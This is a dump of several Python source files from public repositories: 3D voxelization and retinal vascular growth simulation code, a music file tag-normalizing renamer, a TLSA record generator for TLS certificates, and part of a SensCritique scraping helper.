x1 += xs
if (p1 >= 0):
y1 += ys
p1 -= 2 * dx
if (p2 >= 0):
z1 += zs
p2 -= 2 * dx
p1 += 2 * dy
p2 += 2 * dz
ListOfPoints.append((x1, y1, z1))
# Driving axis is Y-axis"
elif (dy >= dx and dy >= dz):
p1 = 2 * dx - dy
p2 = 2 * dz - dy
while (y1 != y2):
y1 += ys
if (p1 >= 0):
x1 += xs
p1 -= 2 * dy
if (p2 >= 0):
z1 += zs
p2 -= 2 * dy
p1 += 2 * dx
p2 += 2 * dz
ListOfPoints.append((x1, y1, z1))
# Driving axis is Z-axis"
else:
p1 = 2 * dy - dz
p2 = 2 * dx - dz
while (z1 != z2):
z1 += zs
if (p1 >= 0):
y1 += ys
p1 -= 2 * dz
if (p2 >= 0):
x1 += xs
p2 -= 2 * dz
p1 += 2 * dy
p2 += 2 * dx
ListOfPoints.append((x1, y1, z1))
return ListOfPoints
def generate_voxels(coords,voxel_size,edges,radii,fast_marching = True):
"""
generates the voxelization for an embedded tree, with radii associated to vertices/edges
:param coords: np.array; the coordinates of vertices in the tree
:param voxel_size: int; the sidelength of the voxel cube the tree is embedded in
:param edges: np.array; the list of edges in the tree
:param radii: np.array; the list of radii associated to the tree, either with vertices or edges
:return voxel_centers: np.array; the list of voxel centers in the voxelization
"""
if len(radii) == len(coords):
#adapt vertex-based radii to edge-based radii
radii = np.array([np.mean(radii[list(e)]) for e in edges])
#get bounding box
bbox_bounds = np.array([(np.min(coords[:,i]),np.max(coords[:,i])) for i in range(coords.shape[1]) ])
#print("bbox bounds: "); print(bbox_bounds)
#convert 3d coords to voxel centers
data_scaling = voxel_size/np.max([bb[1]-bb[0] for bb in bbox_bounds])
#print("data scaling:"); print(data_scaling)
new_pts = ((coords - bbox_bounds[:,0])*data_scaling).astype(int)
if fast_marching:
voxel_centers = []
front = []
#front_dict keeps track of whether a voxel has been checked, what its nearest edge neighbor is, and the distance to that edge neighbor
front_dict = {}
#start by getting the bresenham points
for e_idx,e in enumerate(edges):
front_to_add = Bresenham3D(new_pts[e[0]],new_pts[e[1]])
#print(f"front to add: {front_to_add}")
for pt in front_to_add:
try:
if front_dict[pt]["front"] == 0:
pass
except:
front_dict[pt] = {"front" : 0, "nearest_edge" : e_idx, "dist_to_edge" : 0.}
front.append(pt)
#now propogate the front
while(len(front) > 0):
#pop a member of the front. If it's close to it's nearest edge, add it to voxelization and consider neighbors
temp_pt = front.pop(0)
#check whether the point has been checked yet
if front_dict[temp_pt]["front"] == 0:
#if it hasn't, get the edge info
nearest_edge_idx = front_dict[temp_pt]["nearest_edge"]
nearest_edge = edges[nearest_edge_idx]
#check whether the proposed voxel is close enough to the edges
if front_dict[temp_pt]["dist_to_edge"] <= radii[nearest_edge_idx]*data_scaling:
#point is close enough to an edge, so add it to the voxels
voxel_centers.append(temp_pt)
for nn in voxel_nn(temp_pt,voxel_size):
#check each nn, whether they've been seen and/or the current edge is closer
try:
#try checking whether the next point is closer to this edge or another
new_dist = dist_to_line(nn,new_pts[nearest_edge[0]],new_pts[nearest_edge[1]])
if front_dict[nn]["dist_to_edge"] > new_dist:
#if the last voxels edge is closer than what was written, rewrite
front_dict[nn]["dist_to_edge"] = new_dist
front_dict[nn]["nearest_edge"] = nearest_edge_idx
except:
#nn hasn't been seen yet, so add it to the front and initialize an entry in the dict
dist_to_edge = dist_to_line(nn,new_pts[nearest_edge[0]],new_pts[nearest_edge[1]])
front_dict[nn] = {"front" : 0, "nearest_edge" : nearest_edge_idx, "dist_to_edge" : dist_to_edge}
front.append(nn)
#regardless, the point is no longer in the front
front_dict[pt]["front"] = 1
#once the front has propogated through, collect the remaining voxels
else:
#for each edge in the network, draw the line with width along edge
voxel_centers = set()
#for each edge
for ii,e in enumerate(edges):
##compute the correct Rotation + translation
pt1 = coords[e[0]]
pt2 = coords[e[1]]
R = edge_affine_transform(pt1,pt2)
p = new_pts[e[0]]
##draw the corresponding cylinder
cyl_voxels = generate_voxel_cylinder((np.linalg.norm(pt2-pt1)*data_scaling).astype(int),(radii[ii]*data_scaling).astype(int),affine_transformation = [R,p],return_set = True)
voxel_centers = voxel_centers.union(cyl_voxels)
return np.array(list(voxel_centers))
def dist_to_line(pt, line_pt1, line_pt2):
"""
returns the distance of a point pt to the line spanned by line_pt1 and line_pt2
:param pt: np.array; the point in question
:param line_pt1: np.array; one endpoint of the line segment in question
:param line_pt2: np.array; another endpoint of the line segment in question
:return dist: the distance from the point to the line
"""
if tuple(line_pt1) == tuple(line_pt2):
return np.linalg.norm(np.array(pt) - line_pt1)
else:
#print(f"pt: {pt}, line_pt1: {line_pt1}, line_pt2: {line_pt2}")
s1 = np.array(line_pt2).astype(float) - line_pt1
s1 /= np.linalg.norm(s1)
dist = np.linalg.norm((pt - s1) - np.dot(pt-s1,s1)*s1)
return dist
def voxel_nn(pt,voxel_size):
"""
compute the adjacent voxels to a given voxel
:param pt: tuple; the center voxel
:param voxel_size: int; the size of the voxel cube (side length)
:return nn: list; list of nearest neighbor voxel neighbors in the voxel grid
"""
nn = []
perturb_vals = [-1.,0.,1.]
perturb_pts = np.array([(ii,jj,kk) for ii in perturb_vals for jj in perturb_vals for kk in perturb_vals])
for pp in perturb_pts:
proposed = pp + pt
if (np.min(proposed) >=0.) and (np.max(proposed) <= voxel_size):
nn.append(tuple(proposed))
return nn
def generate_voxel_cylinder(cyl_length,cyl_radius,affine_transformation = None,return_set = True):
"""
generates a standard voxelized cylinder as an alternative to Bresenham's algorithm with thickness
:param cyl_length: int; the length of the cylinder, in voxels along the x-axis
:param cyl_radius: int; the radius of the cylinder, in voxels in the y-z plane
:param affine_trnasformation: [R,p]; list of rotation array R and translation vector p
:return: a list of voxel centers
"""
if affine_transformation is None:
cyl_voxels = [(float(ii),0.,0.) for ii in range(cyl_length)]
temp_idx = cyl_radius
#start at the top of the circle and work down
while temp_idx > 0:
#extend the voxels in the x direction
for jj in range(int(np.sqrt(cyl_radius**2 - temp_idx**2))+1):
#print(f"jj is {jj}")
for ii in range(cyl_length):
cyl_voxels.append((float(ii), float(jj), float(temp_idx)))
cyl_voxels.append((float(ii), float(temp_idx),-float(jj)))
cyl_voxels.append((float(ii), -float(jj), -float(temp_idx)))
cyl_voxels.append((float(ii), -float(temp_idx),float(jj)))
temp_idx -= 1
else:
R, p = affine_transformation
cyl_voxels = [Rp(R,p,(float(ii),0.,0.)) for ii in range(cyl_length)]
temp_idx = cyl_radius
#start at the top of the circle and work down
while temp_idx > 0:
#extend the voxels in the x direction
for jj in range(int(np.sqrt(cyl_radius**2 - temp_idx**2))+1):
#print(f"jj is {jj}")
for ii in range(cyl_length):
cyl_voxels.append(Rp(R,p, (float(ii), float(jj), float(temp_idx)) ))
cyl_voxels.append(Rp(R,p, (float(ii), float(temp_idx),-float(jj)) ))
cyl_voxels.append(Rp(R,p, (float(ii), -float(jj), -float(temp_idx)) ))
cyl_voxels.append(Rp(R,p, (float(ii), -float(temp_idx),float(jj)) ))
temp_idx -= 1
if return_set:
return set(cyl_voxels)
else:
return list(set(cyl_voxels))
def edge_affine_transform(pt1, pt2):
"""
given initial point pt1 and terminal point pt2, compute the affine transformation from (1.,0.,0.) to pt2 - pt1
:param pt1: np.array; initial point
:param pt2: np.array; terminal point
:return R, p: [np.array, tuple]; linear transformation and translation to move and orient edge from origin, (1.,0.,0.)
"""
s1 = np.array(pt2) - pt1
s1 /= np.linalg.norm(s1)
#compute orthogonal plane
if np.abs(s1[0]) > 1e-6:
s2 = np.array([(-s1[1]-s1[2])/s1[0],1.,1.])
elif np.abs(s1[1]) > 1e-6:
s2 = np.array([1.,(-s1[0]-s1[2])/s1[1],1.])
else:
s2 = np.array([1.,1.,(-s1[0]-s1[1])/s1[2]])
s2 /= np.linalg.norm(s2)
s3 = np.array([s1[1]*s2[2] - s1[2]*s2[1],-s1[0]*s2[2] + s1[2]*s2[0],s1[0]*s2[1] - s1[1]*s2[0]])
s3 /= np.linalg.norm(s3)
return np.vstack([s1,s2,s3]).T
def Rp(R,p,pt):
"""
explicitly computes the affine transformation R * pt + p
:param R: np.array; linear transformation
:param p: np.array; translation vector
:param pt: tuple; point to be transformed by
:return new_pt: tuple; transformed point
"""
print(R)
print(p)
new_pt = tuple([ int(sum([R[i][j]*pt[j] for j in range(len(pt))]) + p[i]) for i in range(len(R))])
return new_pt
def sample_SOn(n):
"""
sample a matrix in SO(n) by taking three vectors on the sphere and orthogonalizing
:param n: int; dimension of ambient space
:return A: np.array; resulting matrix in SO(n)
"""
samples = [np.random.normal(size = n) for i in range(n)]
samples = [s/np.linalg.norm(s) for s in samples]
s1 = samples[0]
s2 = samples[1] - np.dot(samples[1],s1)*s1
s2 /= np.linalg.norm(s2)
s3 = samples[2] - np.dot(samples[2],s1)*s1 - np.dot(samples[2],s2)*s2
s3 /= np.linalg.norm(s3)
return np.vstack([s1,s2,s3]).T
def run_voxelization_test(cyl_length = 3, cyl_radius = 3,affine_transformation = True):
from mayavi import mlab
import time
if affine_transformation == True:
affine_transformation = [sample_SOn(3),np.random.randint(low = 20, high = 50)*np.random.rand(3)]
else:
affine_transformation = None
tic = time.time()
voxel_centers = np.array(generate_voxel_cylinder(cyl_length,cyl_radius, affine_transformation = affine_transformation,return_set = False) )
toc = time.time()
print(f"time to compute was: {toc-tic:.3f}")
#for p in test:
# print(p)
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.9,0.,0.))
if affine_transformation is not None:
voxel_centers = np.array(generate_voxel_cylinder(cyl_length,cyl_radius, affine_transformation = None,return_set = False) )
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.,0.,0.9))
mlab.show()
return
#run_voxelization_test(cyl_length = 100)
def run_large_voxelization_test(edges = [[0,1],[0,2],[1,3],[1,4]], coords = np.array([[0.,0.,0.],[0.,1.,0.],[0.,0.,1.],[0.,1.,1.],[1.,1.,0.]]),radii = 0.5*np.array([0.2,0.1,0.05,0.025])):
from mayavi import mlab
import time
tic = time.time()
voxel_centers = generate_voxels(coords, 100,edges,radii)
toc = time.time()
print(f"time to compute was: {toc-tic:.3f}")
#for p in test:
# print(p)
mlab.points3d(voxel_centers[:,0],voxel_centers[:,1],voxel_centers[:,2], mode = "cube", scale_factor = 1.,opacity = 0.2,color= (0.9,0.,0.))
mlab.show()
return
#run_large_voxelization_test()
```
#### File: SyntheticVasculature/TMD/vessel_sim_commands.py
```python
import io
import numpy as np
from scipy import spatial as spspat
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy import integrate as spint
import time
def sphere_init_config(fovea_radius = 0.3,lens_depth = 0.3,num_pts = 100,inner_rad = 0.8,outer_rad = 1.2,prune_into_eye = True):
"""
sample = np.random.normal(size = (num_pts,3))
random_radii = np.random.rand(num_pts)*(outer_rad-inner_rad)+inner_rad
sample = [[sample[i]/np.linalg.norm(sample[i]),random_radii[i]] for i in range(len(sample))]
if prune_into_eye:
#remove portions near iris
for i in range(len(sample)-1,-1,-1):
#print(i)
if (sample[i][0][-1] > 1-lens_depth) or (np.linalg.norm(sample[i][0] - np.array([0.,0.,-1.])) < fovea_radius):
sample.pop(i)
"""
sample = []
while(len(sample) < num_pts):
pt = np.random.normal(size = 3)
pt /= np.linalg.norm(pt)
pt_rad = np.random.rand()*(outer_rad-inner_rad)+inner_rad
sample_pt = [pt,pt_rad]
if prune_into_eye:
if ((pt*pt_rad)[-1] <= 1-lens_depth) and (np.linalg.norm(pt*pt_rad - np.array([0.,0.,-1.])) >= fovea_radius):
sample.append(sample_pt)
return np.array(sample)
def geodesic_dist(p1,p2):
p1norm = np.linalg.norm(p1[0])
p2norm = np.linalg.norm(p2[0])
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
return np.arccos(p1dotp2) + np.abs(p1[1] - p2[1])
def tangent_vector(p1,p2,normalized = True):
p1dotp2 = np.dot(p1[0],p2[0])
if np.abs(p1dotp2)>1.:
p1dotp2 = np.sign(p1dotp2)
p2bar = p2[0] - (p1dotp2)*np.array(p1[0])
p2bar /= np.linalg.norm(p2bar)
#print(p1dotp2)
if normalized:
return np.array([p2bar,(p2[1]-p1[1])/np.abs(p2[1]-p1[1])])
else:
return np.array([(np.arccos(p1dotp2))*p2bar, p2[1]-p1[1]])
def exp_map(pt, direction):
dirnorm = np.linalg.norm(direction[0])
#pt_dot_dir = np.dot(pt,dir)
#dir_bar = dir - pt_dot_dir*np.array(pt)
#dir_bar /= np.linalg.norm(dir_bar)
#theta_star = np.arccos(pt_dot_dir)
return np.array([np.cos(dirnorm)*np.array(pt[0]) + np.sin(dirnorm)*np.array(direction[0])/dirnorm,pt[1]+direction[1] ])
#exp_map([0.,0.,1.2],tangent_vector([0.,0.,1.2],[0.,1,0.]))
"""
p1 = [[0.,0.,1.],1.1]
p2 = [[0.0,1.1,0.],0.9]
print(geodesic_dist(p1,p2))
print(tangent_vector(p1,p2))
"""
"""
X = sphere_init_config(num_pts = 1000)
fig = plt.figure()
ax = fig.add_subplot(111,projection="3d")
ax.scatter(X[:,0],X[:,1],X[:,2])
plt.show()
"""
def prune_dist_chart(dist_chart,min_dist_pointers,death_dist = 0.1):
return
def vascular_growth_sim(num_iterations = 3,fovea_radius = 0.3,lens_depth = 0.5,noisy = True,max_iter = 10,init_num_pts = 1000,inner_rad = 0.7,outer_rad = 1.2, growth_type = "average",weighted_stepsizes = True,D_step = 0.05,death_dist = 0.05,save_time_data = False):
#set up data structure
pt_list = [[[0.5,0.,-0.5*np.sqrt(3)],outer_rad]]
to_grow_indicator = np.array([1])
branches = [[0]]
branch_membership = [[0]]
if save_time_data:
time_data = [[pt_list,list(branches),list(branch_membership)]]
#start the iteration
for iter_count in range(num_iterations):
#sample auxin
if iter_count == 0:
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad)
init_sample = np.array(sample_auxin)
else:
sample_auxin = sphere_init_config(fovea_radius = fovea_radius,lens_depth = lens_depth,num_pts = 2**iter_count*init_num_pts,inner_rad = inner_rad,outer_rad = outer_rad)
D_step = D_step/(2**iter_count);death_dist = death_dist/(2**iter_count)
init_sample = np.vstack([init_sample,sample_auxin])
#print("sampled points are: \n");print(sample_auxin)
#set up auxin-vein node distance chart
if iter_count == 0:
auxin_vein_dists = [geodesic_dist(pt_list[0],s) for s in sample_auxin]
auxin_min_dists = [[0,d] for d in auxin_vein_dists ]
else:
auxin_vein_dists = np.array([[geodesic_dist(pt,s) for s in sample_auxin] for pt in pt_list])
auxin_min_dists = []
for s_idx in range(len(sample_auxin)):
argmin_idx = np.argmin(auxin_vein_dists[:,s_idx])
auxin_min_dists.append([argmin_idx,auxin_vein_dists[argmin_idx,s_idx]])
auxin_min_dists = np.array(auxin_min_dists)
#print("sampled point dists are: \n");print(auxin_vein_dists)
#print("sampled point dists are: \n");print(auxin_min_dists)
count = 0
#"while there are auxin nodes"
while((count < max_iter) and (len(sample_auxin)>0)):
if noisy:
print("at step {}".format(count))
count += 1
#manually find the nearest neighbor
nns = [[] for pt in pt_list]
#print("getting nearest neighbors for {} auxin".format(len(sample_auxin)))
for i in range(len(sample_auxin)):
#match the nearest neighbor of an auxin node to the index of said auxin node
nns[int(auxin_min_dists[i][0])].append(i)
#now compute the step vectors
#print("the to grow indicators are {}".format(to_grow_indicator))
for i in range(len(pt_list))[::-1]:
#print("the nearest neighbors for {} are {}".format(i,nns[i]))
#print("pt {} s nearest neighbors are: {}".format(i,nns[i]))
if len(nns[i])>0:
#check if the given point is a head or not
#if not, generate a new branch
if to_grow_indicator[i] == 0:
branches.append([i])
branch_membership[i].append(len(branches)-1)
#get the step vector for the grown point
#geometry_type = "average" means
if growth_type == "average":
if weighted_stepsizes:
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = True) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
else:
step_vec = sum([(1./len(nns[i]))*tangent_vector(pt_list[i],sample_auxin[k],normalized = False) for k in nns[i]])
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
elif growth_type == "nearest":
#print(auxin_vein_dists)
#print(auxin_vein_dists[i])
if len(pt_list) == 1:
nearest_auxin = 0
else:
#print(auxin_vein_dists.shape)
#print(np.array(auxin_min_dists).shape)
#print(auxin_min_dists)
#print(nns[i])
#print(len(sample_auxin))
nearest_auxin = np.argmin([auxin_vein_dists[i][k] for k in nns[i]])
#now construct the step vector
if weighted_stepsizes:
step_vec = tangent_vector(pt_list[i],sample_auxin[nns[i][nearest_auxin]],normalized = True)
vprime = exp_map(pt_list[i],[D_step*step_vec[0],D_step*step_vec[1]])
else:
step_vec = tangent_vector(pt_list[i],sample_auxin[nns[i][nearest_auxin]],normalized = False)
vprime = exp_map(pt_list[i], [D_step*step_vec[0],D_step*step_vec[1]])
#if the new point is far enough away from the fovea:
if np.linalg.norm(vprime[1]*vprime[0] - np.array([0.,0.,-1.])) > fovea_radius:
#print("growing from {} to {}".format(pt_list[i],vprime))
#add the new point to the list of points
pt_list = np.vstack([pt_list,vprime])
#change the old grow indicator to 0
to_grow_indicator[i] = 0
#change the new grow indicator to 1
to_grow_indicator = np.append(to_grow_indicator,1)
#add branch information for this new branch
branch_membership.append([branch_membership[i][-1]])
branches[branch_membership[i][-1]].append(len(to_grow_indicator)-1)
#update distance array
dists = np.array([geodesic_dist(vprime,s) for s in sample_auxin])
#print("distances to auxin for vprime are: {}".format(dists))
#set up auxin-vein node distance chart
auxin_vein_dists = np.vstack([auxin_vein_dists,dists])
#update min distances
for j in range(len(sample_auxin))[::-1]:
if dists[j] < auxin_min_dists[j][1]:
#update the min distance array
#sample_auxin = np.delete(sample_auxin,j,0)
auxin_min_dists[j][1] = dists[j]
auxin_min_dists[j][0] = len(to_grow_indicator)-1
#prune auxin nodes
for j in range(len(sample_auxin))[::-1]:
#first check whether or not the new point got close enough to an auxin node
#print(dists)
if auxin_min_dists[j][1] < death_dist:
#delete auxin
sample_auxin = np.delete(sample_auxin,j,0)
auxin_vein_dists = np.delete(auxin_vein_dists,j,1)
auxin_min_dists = np.delete(auxin_min_dists,j,0)
#print("to grow indicator is: \n"); print(to_grow_indicator)
#print("new point dists are: \n");print(auxin_vein_dists)
#print("new point dists are: \n");print(auxin_min_dists)
if save_time_data:
time_data.append([pt_list,list(branches),list(branch_membership)])
#while there are auxin nodes left or max_counts has been exceeded
if save_time_data:
return np.array(pt_list), branches, branch_membership, init_sample,time_data
else:
return np.array(pt_list), branches, branch_membership, init_sample
def convert_from_product(pt_list):
new_pts = []
for pt in pt_list:
new_pts.append(pt[1]*np.array(pt[0]))
return np.array(new_pts)
def get_vein_radii(num_pts, branches,init_radii = 0.05,branch_power = 3.):
vein_radii = np.zeros(num_pts)
for br in branches[::-1]:
if len(br) > 0:
vein_radii[br[-1]] = init_radii
for br_idx in range(2,len(br)+1):
vein_radii[br[-br_idx]] = np.power(vein_radii[br[-br_idx]]**(branch_power) + vein_radii[br[-br_idx+1]]**(branch_power),1./branch_power)
return vein_radii
def sim_to_image(pts, branches,vein_radii,dpi = 500,figsize = (6,6),draw_circle = False,c_circle = [0.0,0.0],r_circle = 1.):
fig, ax = plt.subplots(1,1,figsize = figsize,dpi = dpi)
for br in branches:
#isolate the branch pieces below the xy axes
if len(br)>0:
local_br = np.array(br)[pts[br,2]<0.05]
ax.plot(pts[local_br,0],pts[local_br,1],c="k",linewidth = np.mean(vein_radii[local_br]))
#rescale everything
ax.set_xlim([-1.2,1.2])
ax.set_ylim([-1.2,1.2])
#take away boundary buffers?
ax.axis('off')
if draw_circle:
plot_pts = np.array([[r_circle*np.cos(t)+c_circle[0],r_circle*np.sin(t)+c_circle[1]] for t in np.linspace(-np.pi,np.pi,100)])
ax.plot(plot_pts[:,0],plot_pts[:,1])
return fig, ax
#from https://stackoverflow.com/questions/7821518/matplotlib-save-plot-to-numpy-array
def fig_to_img(fig, ax):
fig.add_axes(ax)
fig.canvas.draw()
# this rasterized the figure
X = np.array(fig.canvas.renderer._renderer)
X = 0.2989*X[:,:,1] + 0.5870*X[:,:,2] + 0.1140*X[:,:,3]
plt.close("all")
return X
def restrict_branches(pts,branches,branch_membership,max_height = -0.1):
pt_birth_times = np.zeros(len(pts))
pt_birth_times[0] = 1.
for br in branches:
for i in range(1,len(br)):
if pts[br[i]][-1] > max_height:
pt_birth_times[br[i]] = np.inf
else:
pt_birth_times[br[i]] = pt_birth_times[br[i-1]] + 1
#prune for points with birth times < infinity
new_branches = [[] for br in branches]
new_branch_membership = [[] for pt in pts]
for i in range(len(new_branches)):
for br_pt in branches[i]:
if pt_birth_times[br_pt] < np.inf:
new_branches[i].append(br_pt)
new_branch_membership[br_pt].append(i)
else:
break
return new_branches, new_branch_membership
#new_branches, new_branch_membership = restrict_branches(pts,pt_idx,branches,branch_membership)
def write_sim_data(pts,branches,branch_membership,file_path,file_name):
f = open("{}{}_points.dat".format(file_path,file_name),"w")
for pt in pts:
for coord in pt:
f.write("{:.5f},".format(coord))
f.write("\n")
f.close()
f = open("{}{}_branches.dat".format(file_path,file_name),"w")
for br in branches:
for b in br:
f.write("{},".format(b))
f.write("\n")
f.close()
f = open("{}{}_branch_membership.dat".format(file_path,file_name),"w")
for br in branch_membership:
for b in br:
f.write("{},".format(coord))
f.write("\n")
f.close()
return
def heat_signature(pts, branches,t=1.,num_eigs = 3,save_plot = True):
#initial condition/constants come from integrating bessel functions along branches
#get plot points
r_vals = 0.5*(np.cos(np.linspace(0.,np.pi,20))+1.)
theta_vals = np.linspace(0.,2.*np.pi,100)
#sort eig_vals, get corresponding eig_fns
eig_vals = np.array([ spspec.jn_zeros(eigfn_idx,10) for eigfn_idx in range(num_eigs)])
eig_val_pairs = np.array([ (spspec.jn_zeros(eigfn_idx,10),eigfn_idx) for eigfn_idx in range(num_eigs)])
eig_val_sort_order = np.argsort(eig_vals.ravel())
eig_val_pairs_sorted = eig_val_pairs.ravel()[eig_val_sort_order]
R,THETA = np.meshgrid(r_vals,theta_vals)
X = R*np.cos(THETA)
Y = R*np.sin(THETA)
heat_kernel_consts = []
for i in range(num_eigs):
e_val, e_idx = eig_val_pairs_sorted[i]
kth_eigfn1 = lambda x: spspec.jv(e_idx,e_val*np.linalg.norm(x))*np.cos(e_idx*np.angle(x[0]+1.j*x[1]))
kth_eigfn1_polar = lambda r,theta: spspec.jv(e_idx,e_val*r)*np.cos(e_idx*theta)
#kth_eigfn2 = lambda x: spspec.jv(e_idx,e_val*np.linalg.norm(x))*np.sin(e_idx*np.angle(x[0]+1.j*x[1]))
total_integral = 0.
for br in branches:
total_integral += sum([spint.quad(lambda t: kth_eigfn1(pts[br[ii]]*(1.-t) + pts[br[ii+1]]*t),0,1) for ii in range(len(br)-1)])
heat_kernel_consts.append(total_integral)
heat_kernel = lambda r,theta: sum([heat_kernel_consts[eig_idx]*np.exp(-eig_val_pairs_sorted[eig_idx][0]*t)*spspec.jv(eig_val_pairs_sorted[eig_idx][1],eig_val_pairs_sorted[eig_idx][0]*r)*np.cos(eig_val_pairs_sorted[eig_idx][1]*theta) for eig_idx in range(num_eigs)])
Z = [[heat_kernel(r,theta) for r in r_vals] for theta in theta_vals]
Z = np.array(Z)
if save_plot:
level_bound = np.max([np.abs(np.min(Z)),np.max(Z)])
levels = np.linspace(-level_bound,level_bound,50)
norm = cm.colors.Normalize(vmax=abs(Z).max(), vmin=-abs(Z).max())
cmap = cm.bwr
CS = axes[i,j].contourf(X, Y, Z,levels,alpha = 0.9,norm=norm,cmap = cm.get_cmap(cmap,len(levels)-1))
fig.colorbar(CS,ax=axes[i,j])
plt.show()
return (X,Y), Z
``` |
{
"source": "jqueuniet/admin_tools",
"score": 2
} |
#### File: admin_tools/music/normalize.py
```python
import os, re
from unicodedata import normalize
from mutagen.easyid3 import EasyID3
from mutagen.oggvorbis import OggVorbis
from mutagen.mp4 import MP4
FORMAT_SINGLE = '{0:02} {1}{2}'
FORMAT_MULTI = '{0}-{1:02} {2}{3}'
FORMAT_NOTRACK = '{0}{1}'
FORBIDDEN_CHARS = dict.fromkeys(map(ord, '/\\?%:*"!|><+\x00'), None)
#FORBIDDEN_CHARS = '/\\?%:*"!|><+\x00'
STRIPSPACES = re.compile(r'\s{2,}')
def rename_songs():
files = os.listdir('.')
files.sort()
for filename in files:
(sn, ext) = os.path.splitext(filename)
dirty = False
if ext.lower() == '.ogg':
meta = OggVorbis(filename)
elif ext.lower() == '.mp3':
meta = EasyID3(filename)
elif ext.lower() in ('.mp4', '.m4a'):
meta = MP4(filename)
if '----:com.apple.iTunes:iTunNORM' in meta:
del meta['----:com.apple.iTunes:iTunNORM']
dirty = True
if '----:com.apple.iTunes:iTunSMPB' in meta:
del meta['----:com.apple.iTunes:iTunSMPB']
dirty = True
if dirty:
meta.save()
if 'disk' in meta:
newfilename = (FORMAT_MULTI.format(meta['disk'][0][0],
meta['trkn'][0][0], meta['\xa9nam'][0], ext))
else:
newfilename = (FORMAT_SINGLE.format(meta['trkn'][0][0],
meta['\xa9nam'][0], ext))
newfilename = newfilename.translate(None, FORBIDDEN_CHARS)
newfilename = STRIPSPACES.sub(' ', newfilename)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
continue
else:
if filename not in ('.', '..') and os.path.isdir(filename):
os.chdir(filename)
rename_songs()
os.chdir('..')
uf = filename
newfilename = normalize('NFC', uf)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
continue
if 'discnumber' in meta and len(meta['discnumber'][0]) > 1:
olddn = meta['discnumber'][0]
newdn = meta['discnumber'][0][0]
meta['discnumber'] = newdn
print('{0} shortened to {1}'.format(olddn, newdn))
dirty = True
if 'tracknumber' in meta and not meta['tracknumber'][0].find('/') == -1:
oldtn = meta['tracknumber'][0]
newtn = meta['tracknumber'][0][:meta['tracknumber'][0].find('/')]
meta['tracknumber'] = newtn
print('{0} shortened to {1}'.format(oldtn, newtn))
dirty = True
if dirty:
meta.save()
if 'discnumber' in meta:
newfilename = (FORMAT_MULTI.format(int(meta['discnumber'][0]),
int(meta['tracknumber'][0]), meta['title'][0], ext.lower()))
elif 'tracknumber' in meta:
newfilename = (FORMAT_SINGLE.format(int(meta['tracknumber'][0]),
meta['title'][0], ext.lower()))
else:
try:
newfilename = (FORMAT_NOTRACK.format(meta['title'][0], ext.lower()))
except KeyError:
print('defective file: {0}'.format(filename))
#newfilename = newfilename.translate(None, FORBIDDEN_CHARS)
newfilename = newfilename.translate(FORBIDDEN_CHARS)
newfilename = STRIPSPACES.sub(' ', newfilename)
if not os.path.exists(newfilename):
print('{0} -> {1}'.format(filename, newfilename))
os.rename(filename, newfilename)
if __name__ == '__main__':
rename_songs()
```
#### File: admin_tools/tls/create_tlsa.py
```python
import os, sys, hashlib, argparse
from pyasn1_modules import pem, rfc2459
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import OctetString
def parse_certificate(certificate_path):
fqdns = set()
substrate = pem.readPemFromFile(open(certificate_path))
cert = decoder.decode(substrate, asn1Spec=rfc2459.Certificate())[0]
core = cert['tbsCertificate']
# Hash public key
der = encoder.encode(core.getComponentByName('subjectPublicKeyInfo'))
hash_der = hashlib.sha256()
hash_der.update(der)
pkhash = hash_der.hexdigest()
# Extract CommonName
for rdnss in core['subject']:
for rdns in rdnss:
for name in rdns:
if name.getComponentByName('type') == rfc2459.id_at_commonName:
value = decoder.decode(name.getComponentByName('value'), asn1Spec=rfc2459.DirectoryString())[0]
fqdns.add(str(value.getComponent()))
# Extract SubjectAltName
for extension in core['extensions']:
if extension['extnID'] == rfc2459.id_ce_subjectAltName:
octet_string = decoder.decode(extension.getComponentByName('extnValue'), asn1Spec=OctetString())[0]
(san_list, r) = decoder.decode(octet_string, rfc2459.SubjectAltName())
for san_struct in san_list:
if san_struct.getName() == 'dNSName':
fqdns.add(str(san_struct.getComponent()))
return (pkhash, fqdns)
def create_tlsa(certificate_path, stream, port):
(pkhash, fqdns) = parse_certificate(certificate_path)
for fqdn in fqdns:
print('_{}._{}.{} IN TLSA 3 1 1 {}'.format(port, stream, fqdn, pkhash))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('certificate', help='path to certificate')
parser.add_argument('stream', default='tcp', help='stream type (eg: tcp, udp), default to tcp')
parser.add_argument('port', default='443', help='network port, default to 443')
args = parser.parse_args()
create_tlsa(args.certificate, args.stream, args.port)
``` |
{
"source": "jqueuniet/senscritiquescraper",
"score": 3
} |
#### File: utils/row_utils/videogames_utils.py
```python
import logging
from . import row_utils
from bs4 import element
from typing import List, Dict
logger = logging.getLogger(__name__)
def get_videogames_infos_from_row(row: element.Tag) -> Dict:
"""Returns a dict containing infos for a videogame row."""
return {
"Rank": row_utils.get_rank(row),
"Title": row_utils.get_title(row),
"URL": row_utils.get_url(row),
"Original Title": row_utils.get_original_title(row),
"Year": row_utils.get_year(row),
"Release Date": row_utils.get_baseline_0(row),
"Picture URL": row_utils.get_picture_url(row),
"Genre": row_utils.get_baseline_1(row),
"Developer": row_utils.get_producer(row),
"Platforms": row_utils.get_platforms(row),
"Description": row_utils.get_description(row),
"Average Rating": row_utils.get_average_rating(row),
"Number of Ratings": row_utils.get_number_of_ratings(row),
}
def get_order_videogames_columns() -> List:
"""Returns the order of columns for videogames rows."""
return [
"Rank",
"Title",
"Developer",
"Platforms",
"Average Rating",
